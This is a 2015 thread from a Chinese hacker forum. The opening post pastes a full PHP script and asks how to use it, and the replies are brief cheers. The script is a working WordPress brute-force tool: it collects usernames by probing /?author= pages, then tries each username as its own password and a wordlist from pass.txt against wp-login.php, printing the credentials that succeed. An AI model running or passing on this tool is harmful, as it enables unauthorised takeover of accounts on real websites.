搜索
红客联盟 - 由08安全团队运营»社区首页 技术攻防 技术问答 这个是PHP的爆破口令?是吗?我没有学过php ...
查看: 16220|回复: 211

这个是PHP的爆破口令?是吗?我没有学过php

[复制链接]
安子超
发表于 2015-9-30 22:41:19 | 显示全部楼层 |阅读模式
请大牛看看 顺便教教怎么使用?{:soso_e104:}



<?php set_time_limit(0);$domain = $argv[1]; //获取用户名for ($i=1; $i <= 10; $i++) { $url = $domain."/?author=".$i; $response = httprequest($url,0); if ($response == 404) { continue; } $pattern = "/author\/(.*)\/feed/"; preg_match($pattern, $response, $name); $namearray[] = $name[1];} echo "共获取用户".count($namearray)."名用户\n"; echo "正在破解用户名与密码相同的用户:\n"; $crackname = crackpassword($namearray,"same"); $passwords = file("pass.txt"); echo "正在破解弱口令用户:\n"; if ($crackname) { $namearray = array_diff($namearray,$crackname);} crackpassword($namearray,$passwords); function crackpassword($namearray,$passwords){ global $domain; $crackname = ""; foreach ($namearray as $name) { $url = $domain."/wp-login.php"; if ($passwords == "same") { $post = "log=".urlencode($name)."&pwd=".urlencode($name)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1"; $pos = strpos(httprequest($url,$post),'div id="login_error"'); if ($pos === false) { echo "$name $name"."\n"; $crackname[] = $name; } }else{ foreach ($passwords as $pass) { $post = "log=".urlencode($name)."&pwd=".urlencode($pass)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1"; $pos = strpos(httprequest($url,$post),'div id="login_error"'); if ($pos === false) { echo "$name $pass"."\n"; } } } } return $crackname;} function httprequest($url,$post){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); if($post){ curl_setopt($ch, CURLOPT_POST, 1);//post提交方式 curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } $output = curl_exec($ch); $httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE); curl_close($ch); if ($httpcode == 404) { return 404; }else{ return $output; }}?>
回复

使用道具 举报

H.U.C—Prince
发表于 2015-10-1 20:57:46 | 显示全部楼层
支持中国红客联盟(ihonker.org)
回复 支持 反对

使用道具 举报

a136
发表于 2015-10-2 18:07:54 | 显示全部楼层
学习学习技术,加油!
回复 支持 反对

使用道具 举报

菜鸟小羽
发表于 2015-10-2 18:37:17 | 显示全部楼层
还是不错的哦,顶了
回复 支持 反对

使用道具 举报

xiaoqqf4
发表于 2015-10-3 11:00:38 | 显示全部楼层
还是不错的哦,顶了
回复 支持 反对

使用道具 举报

a136
发表于 2015-10-4 09:03:28 | 显示全部楼层
支持中国红客联盟(ihonker.org)
回复 支持 反对

使用道具 举报

asion
发表于 2015-10-4 10:15:27 | 显示全部楼层
还是不错的哦,顶了
回复 支持 反对

使用道具 举报

sladjfksld
发表于 2015-10-4 11:04:23 | 显示全部楼层
这代码是给人看的么。。。
回复 支持 反对

使用道具 举报

H.U.C-麦麦
发表于 2015-10-4 16:39:27 | 显示全部楼层
支持中国红客联盟(ihonker.org)
回复 支持 反对

使用道具 举报

a136
发表于 2015-10-4 21:20:12 | 显示全部楼层
回复 支持 反对

使用道具 举报

下一页 »
12345678910... 13下一页
返回列表 发帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-2 13:58 , Processed in 0.139056 second(s), 16 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部